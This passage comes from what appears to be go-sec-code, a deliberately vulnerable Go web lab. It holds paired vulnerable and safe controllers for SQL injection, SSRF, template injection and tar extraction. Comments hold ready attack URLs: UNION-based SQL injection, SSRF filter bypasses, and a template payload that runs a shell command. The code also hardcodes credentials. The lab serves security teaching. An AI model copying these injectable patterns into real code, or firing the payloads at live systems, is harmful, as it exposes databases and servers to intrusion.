34 | 		c.Ctx.ResponseWriter.Write([]byte("evil input"))
35 | 	}
36 | }
37 | 


--------------------------------------------------------------------------------
/controllers/sqli.go:
--------------------------------------------------------------------------------
  1 | package controllers
  2 | 
  3 | import (
  4 | 	"context"
  5 | 	"database/sql"
  6 | 	"encoding/json"
  7 | 	"fmt"
  8 | 	"github.com/gogf/gf/database/gdb"
  9 | 	"github.com/jmoiron/sqlx"
 10 | 	"github.com/uptrace/bun"
 11 | 	"github.com/uptrace/bun/dialect/mysqldialect"
 12 | 	"go-sec-code/models"
 13 | 
 14 | 	sq "github.com/Masterminds/squirrel"
 15 | 	"github.com/beego/beego/v2/client/orm"
 16 | 	beego "github.com/beego/beego/v2/server/web"
 17 | 	_ "github.com/go-sql-driver/mysql"
 18 | 	"github.com/gogf/gf/frame/g"
 19 | 	"github.com/jinzhu/gorm"
 20 | 	"xorm.io/xorm"
 21 | )
 22 | 
 23 | const source = "root:a6654665s@tcp(127.0.0.1:3306)/goseccode"
 24 | 
 25 | func init() {
 26 | 	orm.RegisterDriver("mysql", orm.DRMySQL)
 27 | 	orm.RegisterDataBase("default", "mysql", source)
 28 | 	orm.Debug = true
 29 | 	gdb.SetConfig(gdb.Config{
 30 | 		"default": gdb.ConfigGroup{
 31 | 			gdb.ConfigNode{
 32 | 				Type: "mysql",
 33 | 				Link: "root:a6654665s@tcp(127.0.0.1:3306)/goseccode",
 34 | 			},
 35 | 		},
 36 | 	})
 37 | 	g.DB().SetDebug(true)
 38 | }
 39 | 
 40 | type Users struct {
 41 | 	ID       int
 42 | 	Username string
 43 | 	Password string
 44 | }
 45 | 
 46 | type SqlInjectionVuln1Controller struct {
 47 | 	beego.Controller
 48 | }
 49 | 
 50 | type SqlInjectionVuln2Controller struct {
 51 | 	beego.Controller
 52 | }
 53 | 
 54 | type SqlInjectionVuln3Controller struct {
 55 | 	beego.Controller
 56 | }
 57 | 
 58 | type SqlInjectionVuln4Controller struct {
 59 | 	beego.Controller
 60 | }
 61 | 
 62 | type SqlInjectionVuln5Controller struct {
 63 | 	beego.Controller
 64 | }
 65 | 
 66 | type SqlInjectionVuln6Controller struct {
 67 | 	beego.Controller
 68 | }
 69 | 
 70 | type SqlInjectionVuln7Controller struct {
 71 | 	beego.Controller
 72 | }
 73 | 
 74 | type SqlInjectionVuln8Controller struct {
 75 | 	beego.Controller
 76 | }
 77 | 
 78 | type SqlInjectionSafe1Controller struct {
 79 | 	beego.Controller
 80 | }
 81 | 
 82 | type SqlInjectionSafe2Controller struct {
 83 | 	beego.Controller
 84 | }
 85 | 
 86 | type SqlInjectionSafe3Controller struct {
 87 | 	beego.Controller
 88 | }
 89 | 
 90 | // http://127.0.0.1:233/sqlInjection/native/vuln/integer?id=1%20and%20GTID_SUBSET%28CONCAT%280x717a627671%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C190%29%29%2C0x716a767071%29%2C4877%29
 91 | func (c *SqlInjectionVuln1Controller) Get() {
 92 | 	id := c.GetString("id")
 93 | 	db, err := sql.Open("mysql", source)
 94 | 	if err != nil {
 95 | 		panic(err)
 96 | 	}
 97 | 	err = db.Ping()
 98 | 	if err != nil {
 99 | 		panic(err)
100 | 	}
101 | 	defer db.Close()
102 | 	sqlStr := fmt.Sprintf("select * from user where id=%s", id)
103 | 	user := models.User{}
104 | 	err = db.QueryRow(sqlStr).Scan(&user.Id, &user.Username, &user.Password)
105 | 	if err != nil {
106 | 		panic(err)
107 | 	}
108 | 	output, err := json.Marshal(user)
109 | 	if err != nil {
110 | 		panic(err)
111 | 	}
112 | 	c.Ctx.ResponseWriter.Write(output)
113 | }
114 | 
115 | // http://127.0.0.1:233/sqlInjection/native/vuln/string?username=-6894%22%20UNION%20ALL%20SELECT%20CONCAT(0x71706b7171%2CIFNULL(CAST(CURRENT_USER()%20AS%20NCHAR)%2C0x20)%2C0x717a716b71)%2CNULL%2CNULL%23
116 | func (c *SqlInjectionVuln2Controller) Get() {
117 | 	username := c.GetString("username")
118 | 	db, err := sql.Open("mysql", source)
119 | 	if err != nil {
120 | 		panic(err)
121 | 	}
122 | 	err = db.Ping()
123 | 	if err != nil {
124 | 		panic(err)
125 | 	}
126 | 	defer db.Close()
127 | 	sqlStr := fmt.Sprintf("select * from user where username=\"%s\"", username)
128 | 	user := models.User{}
129 | 	err = db.QueryRow(sqlStr).Scan(&user.Id, &user.Username, &user.Password)
130 | 	if err != nil {
131 | 		panic(err)
132 | 	}
133 | 	output, err := json.Marshal(user)
134 | 	if err != nil {
135 | 		panic(err)
136 | 	}
137 | 	c.Ctx.ResponseWriter.Write(output)
138 | }
139 | 
140 | // http://127.0.0.1:233/sqlInjection/orm/vuln/xorm?field=GTID_SUBSET%28CONCAT%280x717a627671%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C190%29%29%2C0x716a767071%29%2C4877%29&username=admin
141 | func (c *SqlInjectionVuln3Controller) Get() {
142 | 	username := c.GetString("username")
143 | 	field := c.GetString("field")
144 | 	engine, err := xorm.NewEngine("mysql", source)
145 | 	if err != nil {
146 | 		panic(err)
147 | 	}
148 | 	engine.ShowSQL(true)
149 | 	user := models.User{}
150 | 	session := engine.Prepare().And(fmt.Sprintf("%s like ?", field), username)
151 | 	ok, err := session.Get(&user)
152 | 	if !ok && err != nil {
153 | 		panic(err)
154 | 	}
155 | 	output, err := json.Marshal(user)
156 | 	if err != nil {
157 | 		panic(err)
158 | 	}
159 | 	c.Ctx.ResponseWriter.Write(output)
160 | }
161 | 
162 | // http://127.0.0.1:233/sqlInjection/generator/vuln/squirrel?order=id%20AND%20GTID_SUBSET(CONCAT(0x7171717071%2C(MID((IFNULL(CAST(CURRENT_USER()%20AS%20NCHAR)%2C0x20))%2C1%2C190))%2C0x71717a7071)%2C6738)&username=admin
163 | func (c *SqlInjectionVuln4Controller) Get() {
164 | 	username := c.GetString("username")
165 | 	order := c.GetString("order")
166 | 	db, err := sql.Open("mysql", source)
167 | 	if err != nil {
168 | 		panic(err)
169 | 	}
170 | 	err = db.Ping()
171 | 	if err != nil {
172 | 		panic(err)
173 | 	}
174 | 	defer db.Close()
175 | 	expression := sq.Select("*").From("user").Where(sq.Eq{"username": username}).OrderBy(order)
176 | 	sqlStr, args, err := expression.ToSql()
177 | 	fmt.Println(sqlStr)
178 | 	if err != nil {
179 | 		panic(err)
180 | 	}
181 | 	user := models.User{}
182 | 	err = db.QueryRow(sqlStr, args...).Scan(&user.Id, &user.Username, &user.Password)
183 | 	if err != nil {
184 | 		panic(err)
185 | 	}
186 | 	output, err := json.Marshal(user)
187 | 	if err != nil {
188 | 		panic(err)
189 | 	}
190 | 	c.Ctx.ResponseWriter.Write(output)
191 | }
192 | 
193 | // http://127.0.0.1:233/sqlInjection/generator/vuln/bun?username=admin'%20UNION%20ALL%20SELECT%20NULL%2CCONCAT(0x717a707071%2CIFNULL(CAST(CURRENT_USER()%20AS%20CHAR)%2C0x20)%2C0x71716a6271)%2CNULL--%20-
194 | func (c *SqlInjectionVuln5Controller) Get() {
195 | 	username := c.GetString("username")
196 | 	db, err := sql.Open("mysql", source)
197 | 	if err != nil {
198 | 		panic(err)
199 | 	}
200 | 	bundb := bun.NewDB(db, mysqldialect.New())
201 | 	ctx := context.Background()
202 | 	// 构造可能导致 SQL 注入的查询
203 | 	query := fmt.Sprintf("SELECT * FROM user WHERE username = '%s' ", username)
204 | 	var users []Users
205 | 	err = bundb.NewRaw(query).Scan(ctx, &users)
206 | 	if err != nil {
207 | 		panic(err)
208 | 	}
209 | 	output, err := json.Marshal(users)
210 | 	c.Ctx.ResponseWriter.Write(output)
211 | 	//db := bun.NewDB(sqlite, sqlitedialect.New())
212 | 	//bun.NewRawQuery(db, untrusted)
213 | 	//
214 | 	//db.ExecContext(ctx, untrusted)
215 | 	//db.PrepareContext(ctx, untrusted)
216 | 	//db.QueryContext(ctx, untrusted)
217 | 	//db.QueryRowContext(ctx, untrusted)
218 | 	//
219 | 	//db.Exec(untrusted)
220 | 	//db.NewRaw(untrusted)
221 | 	//db.Prepare(untrusted)
222 | 	//db.Query(untrusted)
223 | 	//db.QueryRow(untrusted)
224 | 	//db.Raw(untrusted)
225 | 	//
226 | 	//db.NewSelect().ColumnExpr(untrusted)
227 | 	//db.NewSelect().DistinctOn(untrusted)
228 | 	//db.NewSelect().For(untrusted)
229 | 	//db.NewSelect().GroupExpr(untrusted)
230 | 	//db.NewSelect().Having(untrusted)
231 | 	//db.NewSelect().ModelTableExpr(untrusted)
232 | 	//db.NewSelect().OrderExpr(untrusted)
233 | 	//db.NewSelect().TableExpr(untrusted)
234 | 	//db.NewSelect().Where(untrusted)
235 | 	//db.NewSelect().WhereOr(untrusted)
236 | }
237 | 
238 | // http://127.0.0.1:233/sqlInjection/generator/vuln/gorm?username=admin'%20UNION%20ALL%20SELECT%20NULL%2CCONCAT(0x717a707071%2CIFNULL(CAST(CURRENT_USER()%20AS%20CHAR)%2C0x20)%2C0x71716a6271)%2CNULL--%20-
239 | func (c *SqlInjectionVuln6Controller) Get() {
240 | 	username := c.GetString("username")
241 | 	db, err := sql.Open("mysql", source)
242 | 	if err != nil {
243 | 		panic(err)
244 | 	}
245 | 	var users []Users
246 | 	gormDB, err := gorm.Open("mysql", db)
247 | 	query := fmt.Sprintf("SELECT * FROM user WHERE username = '%s' ", username)
248 | 	rows, err := gormDB.Raw(query).Rows()
249 | 	if err != nil {
250 | 		panic(err)
251 | 	}
252 | 	defer rows.Close()
253 | 	for rows.Next() {
254 | 		var user Users
255 | 		gormDB.ScanRows(rows, &user)
256 | 		users = append(users, user)
257 | 	}
258 | 	output, err := json.Marshal(users)
259 | 	if err != nil {
260 | 		panic(err)
261 | 	}
262 | 	c.Ctx.ResponseWriter.Write(output)
263 | 
264 | 	//db1 := gorm1.DB{}
265 | 	//db1.Where(untrusted)
266 | 	//db1.Raw(untrusted)
267 | 	//db1.Not(untrusted)
268 | 	//db1.Order(untrusted)
269 | 	//db1.Or(untrusted)
270 | 	//db1.Select(untrusted)
271 | 	//db1.Table(untrusted)
272 | 	//db1.Group(untrusted)
273 | 	//db1.Having(untrusted)
274 | 	//db1.Joins(untrusted)
275 | 	//db1.Exec(untrusted)
276 | 	//db1.Pluck(untrusted, nil)
277 | 
278 | }
279 | 
280 | // http://127.0.0.1:233/sqlInjection/generator/vuln/sqlx?username=admin'%20UNION%20ALL%20SELECT%20CONCAT(0x716a767671%2CIFNULL(CAST(CURRENT_USER()%20AS%20CHAR)%2C0x20)%2C0x717a6b6271)%2CNULL%2CNULL--%20-
281 | func (c *SqlInjectionVuln7Controller) Get() {
282 | 	username := c.GetString("username")
283 | 	sqlxdb, err := sqlx.Open("mysql", source)
284 | 	if err != nil {
285 | 		panic(err)
286 | 	}
287 | 
288 | 	var users []Users
289 | 	query := fmt.Sprintf("SELECT * FROM user WHERE username = '%s'", username)
290 | 	err = sqlxdb.Select(&users, query)
291 | 	if err != nil {
292 | 		panic(err)
293 | 	}
294 | 	output, err := json.Marshal(users)
295 | 	if err != nil {
296 | 		panic(err)
297 | 	}
298 | 	c.Ctx.ResponseWriter.Write(output)
299 | 	//db := sqlx.DB{}
300 | 	//untrusted := getUntrustedString()
301 | 	//db.Select(nil, untrusted)
302 | 	//db.Get(nil, untrusted)
303 | 	//db.MustExec(untrusted)
304 | 	//db.Queryx(untrusted)
305 | 	//db.NamedExec(untrusted, nil)
306 | 	//db.NamedQuery(untrusted, nil)
307 | }
308 | 
309 | // http://127.0.0.1:233/sqlInjection/generator/vuln/gf?username=admin'%20UNION%20ALL%20SELECT%20CONCAT(0x716a767671%2CIFNULL(CAST(CURRENT_USER()%20AS%20CHAR)%2C0x20)%2C0x717a6b6271)%2CNULL%2CNULL--%20-
310 | func (c *SqlInjectionVuln8Controller) Get() {
311 | 	username := c.GetString("username")
312 | 	query := fmt.Sprintf("SELECT * FROM user WHERE username = '%s'", username)
313 | 
314 | 	result, err := g.DB().Query(query)
315 | 	if err != nil {
316 | 		panic(err)
317 | 	}
318 | 	defer result.Close()
319 | 	for result.Next() {
320 | 		var id int
321 | 		var username, password string
322 | 		if err := result.Scan(&id, &username, &password); err != nil {
323 | 			panic(err)
324 | 		}
325 | 		users := Users{
326 | 			ID:       id,
327 | 			Username: username,
328 | 			Password: password,
329 | 		}
330 | 		output, err := json.Marshal(users)
331 | 		if err != nil {
332 | 			panic(err)
333 | 		}
334 | 		c.Ctx.ResponseWriter.Write(output)
335 | 	}
336 | 	//func gogfCoreTest(sql string, c *gdb.Core) {
337 | 	//	c.Exec(sql, nil)               // $ querystring=sql
338 | 	//	c.GetAll(sql, nil)             // $ querystring=sql
339 | 	//	c.GetArray(sql, nil)           // $ querystring=sql
340 | 	//	c.GetCount(sql, nil)           // $ querystring=sql
341 | 	//	c.GetOne(sql, nil)             // $ querystring=sql
342 | 	//	c.GetValue(sql, nil)           // $ querystring=sql
343 | 	//	c.Prepare(sql, true)           // $ querystring=sql
344 | 	//	c.Query(sql, nil)              // $ querystring=sql
345 | 	//	c.Raw(sql, nil)                // $ querystring=sql
346 | 	//	c.GetScan(nil, sql, nil)       // $ querystring=sql
347 | 	//	c.GetStruct(nil, sql, nil)     // $ querystring=sql
348 | 	//	c.GetStructs(nil, sql, nil)    // $ querystring=sql
349 | 	//	c.DoCommit(nil, nil, sql, nil) // $ querystring=sql
350 | 	//	c.DoExec(nil, nil, sql, nil)   // $ querystring=sql
351 | 	//	c.DoGetAll(nil, nil, sql, nil) // $ querystring=sql
352 | 	//	c.DoQuery(nil, nil, sql, nil)  // $ querystring=sql
353 | 	//	c.DoPrepare(nil, nil, sql)     // $ querystring=sql
354 | 	//}
355 | 
356 | }
357 | 
358 | func (c *SqlInjectionSafe1Controller) Get() {
359 | 	id, err := c.GetInt("id", 1)
360 | 	if err != nil {
361 | 		panic(err)
362 | 	}
363 | 	db, err := sql.Open("mysql", source)
364 | 	if err != nil {
365 | 		panic(err)
366 | 	}
367 | 	err = db.Ping()
368 | 	if err != nil {
369 | 		panic(err)
370 | 	}
371 | 	defer db.Close()
372 | 	sqlStr := "select * from user where id=?"
373 | 	user := models.User{}
374 | 	err = db.QueryRow(sqlStr, id).Scan(&user.Id, &user.Username, &user.Password)
375 | 	if err != nil {
376 | 		panic(err)
377 | 	}
378 | 	output, err := json.Marshal(user)
379 | 	if err != nil {
380 | 		panic(err)
381 | 	}
382 | 	c.Ctx.ResponseWriter.Write(output)
383 | }
384 | 
385 | func (c *SqlInjectionSafe2Controller) Get() {
386 | 	username := c.GetString("username")
387 | 	db, err := sql.Open("mysql", source)
388 | 	if err != nil {
389 | 		panic(err)
390 | 	}
391 | 	err = db.Ping()
392 | 	if err != nil {
393 | 		panic(err)
394 | 	}
395 | 	defer db.Close()
396 | 	sqlStr := "select * from user where username=?"
397 | 	user := models.User{}
398 | 	err = db.QueryRow(sqlStr, username).Scan(&user.Id, &user.Username, &user.Password)
399 | 	if err != nil {
400 | 		panic(err)
401 | 	}
402 | 	output, err := json.Marshal(user)
403 | 	if err != nil {
404 | 		panic(err)
405 | 	}
406 | 	c.Ctx.ResponseWriter.Write(output)
407 | }
408 | 
409 | func (c *SqlInjectionSafe3Controller) Get() {
410 | 	username := c.GetString("username")
411 | 	field := c.GetString("field")
412 | 	o := orm.NewOrm()
413 | 	user := models.User{}
414 | 	cond := orm.NewCondition().And(field+"__icontains", username)
415 | 	qs := o.QueryTable(&models.User{})
416 | 	err := qs.SetCond(cond).One(&user)
417 | 	if err != nil {
418 | 		panic(err)
419 | 	}
420 | 	output, err := json.Marshal(user)
421 | 	if err != nil {
422 | 		panic(err)
423 | 	}
424 | 	c.Ctx.ResponseWriter.Write(output)
425 | }
426 | 
427 | //todo:
428 | //github.com/rqlite/gorqlite
429 | //github.com/go-pg/pg
430 | 


--------------------------------------------------------------------------------
/controllers/ssrf.go:
--------------------------------------------------------------------------------
  1 | package controllers
  2 | 
  3 | import (
  4 | 	"context"
  5 | 	"fmt"
  6 | 	"go-sec-code/utils"
  7 | 	"golang.org/x/net/websocket"
  8 | 	"io/ioutil"
  9 | 	"net/http"
 10 | 	"strings"
 11 | 
 12 | 	beego "github.com/beego/beego/v2/server/web"
 13 | 	gorilla_websocket "github.com/gorilla/websocket"
 14 | 	nhooyr_websocket "nhooyr.io/websocket"
 15 | )
 16 | 
 17 | type SSRFVuln1Controller struct {
 18 | 	beego.Controller
 19 | }
 20 | 
 21 | type SSRFVuln2Controller struct {
 22 | 	beego.Controller
 23 | }
 24 | 
 25 | type SSRFVuln3Controller struct {
 26 | 	beego.Controller
 27 | }
 28 | 
 29 | type SSRFSafe1Controller struct {
 30 | 	beego.Controller
 31 | }
 32 | 
 33 | type SSRFVulnXWebsocketController struct {
 34 | 	beego.Controller
 35 | }
 36 | 
 37 | type SSRFSafeXWebsocketController struct {
 38 | 	beego.Controller
 39 | }
 40 | 
 41 | type SSRFVulnnhooyrWebsocketController struct {
 42 | 	beego.Controller
 43 | }
 44 | 
 45 | type SSRFVulngorillaWebsocketController struct {
 46 | 	beego.Controller
 47 | }
 48 | 
 49 | // http://127.0.0.1:233/ssrf/vuln?url=http://www.baidu.com
 50 | func (c *SSRFVuln1Controller) Get() {
 51 | 	url := c.GetString("url", "http://www.example.com")
 52 | 	res, err := http.Get(url)
 53 | 	if err != nil {
 54 | 		panic(err)
 55 | 	}
 56 | 	defer res.Body.Close()
 57 | 	body, err := ioutil.ReadAll(res.Body)
 58 | 	if err != nil {
 59 | 		panic(err)
 60 | 	}
 61 | 	c.Ctx.ResponseWriter.Write(body)
 62 | }
 63 | 
 64 | // bypass can be :
 65 | // http://LOCALHOST:233
 66 | // http://localhost.:233
 67 | // http://0:233
 68 | // and others
 69 | // http://127.0.0.1:233/ssrf/vuln/obfuscation?url=http://baidu.com
 70 | // http://127.0.0.1:233/ssrf/vuln/obfuscation?url=http://localhost.:233
 71 | func (c *SSRFVuln2Controller) Get() {
 72 | 	url := c.GetString("url", "http://www.example.com")
 73 | 	ssrfFilter := utils.SSRFFilter{}
 74 | 	blacklists := []string{"localhost", "127.0.0.1"}
 75 | 	evil := ssrfFilter.DoBlackFilter(url, blacklists)
 76 | 	if evil == true {
 77 | 		c.Ctx.ResponseWriter.Write([]byte("evil input"))
 78 | 	} else {
 79 | 		res, err := http.Get(url)
 80 | 		if err != nil {
 81 | 			panic(err)
 82 | 		}
 83 | 		defer res.Body.Close()
 84 | 		body, err := ioutil.ReadAll(res.Body)
 85 | 		if err != nil {
 86 | 			panic(err)
 87 | 		}
 88 | 		c.Ctx.ResponseWriter.Write(body)
 89 | 	}
 90 | }
 91 | 
 92 | func (c *SSRFVuln3Controller) Get() {
 93 | 	url := c.GetString("url", "http://www.example.com")
 94 | 	ssrfFilter := utils.SSRFFilter{}
 95 | 	evil := ssrfFilter.DoGogsFilter(url)
 96 | 	if evil == true {
 97 | 		c.Ctx.ResponseWriter.Write([]byte("evil input"))
 98 | 	} else {
 99 | 		res, err := http.Get(url)
100 | 		if err != nil {
101 | 			panic(err)
102 | 		}
103 | 		defer res.Body.Close()
104 | 		body, err := ioutil.ReadAll(res.Body)
105 | 		if err != nil {
106 | 			panic(err)
107 | 		}
108 | 		c.Ctx.ResponseWriter.Write(body)
109 | 	}
110 | }
111 | 
112 | func (c *SSRFSafe1Controller) Get() {
113 | 	url := c.GetString("url", "http://www.example.com")
114 | 	ssrfFilter := utils.SSRFFilter{}
115 | 	whitelists := []string{"example.com"}
116 | 	evil := ssrfFilter.DoWhiteFilter(url, whitelists)
117 | 	if evil == true {
118 | 		c.Ctx.ResponseWriter.Write([]byte("evil input"))
119 | 	} else {
120 | 		res, err := http.Get(url)
121 | 		if err != nil {
122 | 			panic(err)
123 | 		}
124 | 		defer res.Body.Close()
125 | 		body, err := ioutil.ReadAll(res.Body)
126 | 		if err != nil {
127 | 			panic(err)
128 | 		}
129 | 		c.Ctx.ResponseWriter.Write(body)
130 | 	}
131 | }
132 | 
133 | // http://127.0.0.1:233/ssrf/vuln/websocket?url=ws://localhost:233
134 | // http://127.0.0.1:233/ssrf/vuln/websocket?url=ws://localhost:243
135 | func (c *SSRFVulnXWebsocketController) Get() {
136 | 	wsurl := c.GetString("url", "ws://localhost:243")
137 | 	//untrustedInput := "ws://localhost:243"
138 | 	origin := "http://localhost/"
139 | 	// bad as input is directly passed to dial function
140 | 	ws, err := websocket.Dial(wsurl, "", origin)
141 | 	if err != nil {
142 | 		errorMsg := fmt.Sprintf("Error connecting to WebSocket: %v\n", err)
143 | 		c.Ctx.ResponseWriter.Write([]byte(errorMsg))
144 | 		return
145 | 	}
146 | 	var msg = make([]byte, 512)
147 | 	var n int
148 | 	n, _ = ws.Read(msg)
149 | 	fmt.Printf("Received: %s.\n", msg[:n])
150 | 	c.Ctx.ResponseWriter.Write(msg[:n])
151 | }
152 | 
153 | // http://127.0.0.1:233/ssrf/safe/websocket?url=ws://localhost:233
154 | // http://127.0.0.1:233/ssrf/safe/websocket?url=ws://localhost:243
155 | func (c *SSRFSafeXWebsocketController) Get() {
156 | 	wsurl := c.GetString("url", "ws://localhost:243")
157 | 	//untrustedInput := "ws://localhost:243"
158 | 	origin := "http://localhost/"
159 | 	// bad as input is directly passed to dial function
160 | 	rightwsurl := strings.TrimRight(wsurl, "\n\r")
161 | 	if rightwsurl == "ws://localhost:243/ws" {
162 | 		ws, err := websocket.Dial(wsurl, "", origin)
163 | 		if err != nil {
164 | 			errorMsg := fmt.Sprintf("Error connecting to WebSocket: %v\n", err)
165 | 			c.Ctx.ResponseWriter.Write([]byte(errorMsg))
166 | 			return
167 | 		}
168 | 		var msg = make([]byte, 512)
169 | 		var n int
170 | 		n, _ = ws.Read(msg)
171 | 		fmt.Printf("Received: %s.\n", msg[:n])
172 | 		c.Ctx.ResponseWriter.Write(msg[:n])
173 | 	}
174 | 	c.Ctx.ResponseWriter.Write([]byte("evil input"))
175 | }
176 | 
177 | // http://127.0.0.1:233/ssrf/vuln/nhooyr_websocket?url=ws://localhost:234
178 | // http://127.0.0.1:233/ssrf/vuln/nhooyr_websocket?url=ws://localhost:233
179 | func (c *SSRFVulnnhooyrWebsocketController) Get() {
180 | 	untrustedInput := c.GetString("url", "ws://localhost:243")
181 | 	//untrustedInput := "ws://localhost:233"
182 | 	//origin := "http://localhost/"
183 | 	conn, _, err := nhooyr_websocket.Dial(context.Background(), untrustedInput, nil)
184 | 	if err != nil {
185 | 		errorMsg := fmt.Sprintf("Error connecting to WebSocket:", err)
186 | 		c.Ctx.ResponseWriter.Write([]byte(errorMsg))
187 | 		return
188 | 	}
189 | 	conn.Close(nhooyr_websocket.StatusNormalClosure, "Closing connection")
190 | 
191 | }
192 | 
193 | // http://127.0.0.1:233/ssrf/vuln/gorilla_websocket?url=ws://localhost:234
194 | // http://127.0.0.1:233/ssrf/vuln/gorilla_websocket?url=ws://localhost:233
195 | func (c *SSRFVulngorillaWebsocketController) Get() {
196 | 	untrustedInput := c.GetString("url", "ws://localhost:243")
197 | 	//untrustedInput := "ws://localhost:233"
198 | 	//origin := "http://localhost/"
199 | 	dialer := gorilla_websocket.Dialer{}
200 | 	conn, _, err := dialer.Dial(untrustedInput, nil)
201 | 	if err != nil {
202 | 		errorMsg := fmt.Sprintf("Error connecting to WebSocket:", err)
203 | 		c.Ctx.ResponseWriter.Write([]byte(errorMsg))
204 | 		return
205 | 	}
206 | 	defer conn.Close()
207 | 	c.Ctx.ResponseWriter.Write([]byte("res"))
208 | }
209 | 
210 | //gobwas_websocket "github.com/gobwas/ws"
211 | //func (c *websocket2) Get() {
212 | //	untrustedInput := c.GetString("url", "ws://localhost:243")
213 | //	_, _, _, err := gobwas_websocket.Dial(context.TODO(), untrustedInput)
214 | //	if err != nil {
215 | //		fmt.Println("Error connecting to WebSocket:", err)
216 | //		return
217 | //	}
218 | //}
219 | 
220 | //github.com/sacOO7/gowebsocket
221 | 


--------------------------------------------------------------------------------
/controllers/ssti.go:
--------------------------------------------------------------------------------
 1 | package controllers
 2 | 
 3 | import (
 4 | 	"bytes"
 5 | 	"fmt"
 6 | 	"github.com/Masterminds/sprig"
 7 | 	beego "github.com/beego/beego/v2/server/web"
 8 | 	"html/template"
 9 | 	"io/ioutil"
10 | 	"os"
11 | 	"os/exec"
12 | )
13 | 
14 | type User struct {
15 | 	Id     int
16 | 	Name   string
17 | 	Passwd string
18 | }
19 | 
20 | type SSTIVuln1Controller struct {
21 | 	beego.Controller
22 | }
23 | 
24 | type SSTISafe1Controller struct {
25 | 	beego.Controller
26 | }
27 | 
28 | type SSTIVuln2Controller struct {
29 | 	beego.Controller
30 | }
31 | 
32 | type SSTISafe2Controller struct {
33 | 	beego.Controller
34 | }
35 | 
36 | func (c *SSTIVuln1Controller) Get() {
37 | 	os.Setenv("go-sec-code-secret-key", "b81024f158eefcf60792ae9df9524f82")
38 | 	usertemplate := c.GetString("template", "please send your template")
39 | 	t := template.New("ssti").Funcs(sprig.FuncMap())
40 | 	t, _ = t.Parse(usertemplate)
41 | 	buff := bytes.Buffer{}
42 | 	err := t.Execute(&buff, struct{}{})
43 | 	if err != nil {
44 | 		panic(err)
45 | 	}
46 | 	data, err := ioutil.ReadAll(&buff)
47 | 	if err != nil {
48 | 		panic(err)
49 | 	}
50 | 	c.Data["usertemplate"] = string(data)
51 | 	c.TplName = "ssti.tpl"
52 | }
53 | 
54 | func (c *SSTISafe1Controller) Get() {
55 | 	usertemplate := c.GetString("template", "please send your template")
56 | 	c.Data["usertemplate"] = usertemplate
57 | 	c.TplName = "ssti.tpl"
58 | }
59 | 
60 | func (u User) Secret(test string) string {
61 | 	out, _ := exec.Command(test).CombinedOutput()
62 | 	return string(out)
63 | }
64 | 
65 | // http://127.0.0.1:233/ssti/vuln2?template={{.Passwd}}
66 | // http://127.0.0.1:233/ssti/vuln2?template={{.}}
67 | // http://127.0.0.1:233/ssti/vuln2?template={{.Secret "whoami"}}
68 | // http://127.0.0.1:233/ssti/vuln2?template={{%22%3Cscript%3Ealert(/xss/)%3C/script%3E%22}}
69 | func (c *SSTIVuln2Controller) Get() {
70 | 	user := &User{1, "admin", "123456"}
71 | 	arg := c.GetString("template", "please send your template")
72 | 	tpl1 := fmt.Sprintf(`<h1>Hi, ` + arg + `</h1> Your name is ` + arg + `!`) //使用Sprintf，将数据进行拼接以后返回纯文本再赋值给tpl1；
73 | 	html, err := template.New("login").Parse(tpl1)                            //进行模板渲染
74 | 	//这里创建一个名为 "login" 的模板，并将模板字符串 tpl1 解析到该模板中。template.New()函数作用是创建一个新的模板，Parse()是用于解析模板字符串。
75 | 	html = template.Must(html, err)
76 | 	c.Ctx.ResponseWriter.Header().Set("Content-Type", "text/html")
77 | 	html.Execute(c.Ctx.ResponseWriter, user)
78 | }
79 | 
80 | func (c *SSTISafe2Controller) Get() {
81 | 	user := &User{1, "admin", "123456"}
82 | 	arg := c.GetString("template", "please send your template")
83 | 	arg = template.HTMLEscapeString(arg)
84 | 	tpl1 := fmt.Sprintf(`<h1>Hi, ` + arg + `</h1> Your name is ` + arg + `!`) //使用Sprintf，将数据进行拼接以后返回纯文本再赋值给tpl1；
85 | 	data := map[string]string{
86 | 		"arg":  arg,
87 | 		"Name": user.Name,
88 | 	}
89 | 	html, err := template.New("login").Parse(tpl1) //进行模板渲染
90 | 	//这里创建一个名为 "login" 的模板，并将模板字符串 tpl1 解析到该模板中。template.New()函数作用是创建一个新的模板，Parse()是用于解析模板字符串。
91 | 	html = template.Must(html, err)
92 | 	c.Ctx.ResponseWriter.Header().Set("Content-Type", "text/html")
93 | 	html.Execute(c.Ctx.ResponseWriter, data)
94 | }
95 | 


--------------------------------------------------------------------------------
/controllers/tarslip.go:
--------------------------------------------------------------------------------
  1 | package controllers
  2 | 
  3 | import (
  4 | 	"archive/tar"
  5 | 	"fmt"
  6 | 	beego "github.com/beego/beego/v2/server/web"
  7 | 	"io"
  8 | 	"os"
  9 | 	path "path/filepath"
 10 | )
 11 | 
 12 | type TarSlipVuln1Controller struct {
 13 | 	beego.Controller
 14 | }
 15 | 
 16 | func (c *TarSlipVuln1Controller) Get() {
 17 | 	c.TplName = "fileUpload.tpl"
 18 | }
 19 | 
 20 | // https://github.com/leveryd/go-sec-code/blob/master/pkg/handler/unsafe/untar.go
 21 | func DeCompressTar(srcFilePath, destDirPath string) error {
 22 | 	// Create destination directory
 23 | 	os.Mkdir(destDirPath, os.ModePerm)
 24 | 	fr, err := os.Open(srcFilePath)
 25 | 	if err != nil {
 26 | 		return err
 27 | 	}
 28 | 
 29 | 	defer func(fr *os.File) {
 30 | 		err := fr.Close()
 31 | 		if err != nil {
 32 | 			panic(err)
 33 | 		}
 34 | 	}(fr)
 35 | 
 36 | 	//// Gzip reader
 37 | 	//gr, err := gzip.NewReader(fr)
 38 | 	//if err != nil {
 39 | 	//	return err
 40 | 	//}
 41 | 	//
 42 | 	//defer func(gr *gzip.Reader) {
 43 | 	//	err := gr.Close()
 44 | 	//	if err != nil {
 45 | 	//
 46 | 	//	}
 47 | 	//}(gr)
 48 | 
 49 | 	// Tar reader
 50 | 	//tr := tar.NewReader(gr)
 51 | 	tr := tar.NewReader(fr)
 52 | 	for {
 53 | 		hdr, err := tr.Next()
 54 | 		if err == io.EOF {
 55 | 			// End of tar archive
 56 | 			break
 57 | 		}
 58 | 		if err != nil {
 59 | 			return err
 60 | 		}
 61 | 		fmt.Println("UnTarGzing file..." + hdr.Name)
 62 | 		// Check if it is diretory or file
 63 | 		if hdr.Typeflag != tar.TypeDir {
 64 | 			// Get files from archive
 65 | 			// Create diretory before create file
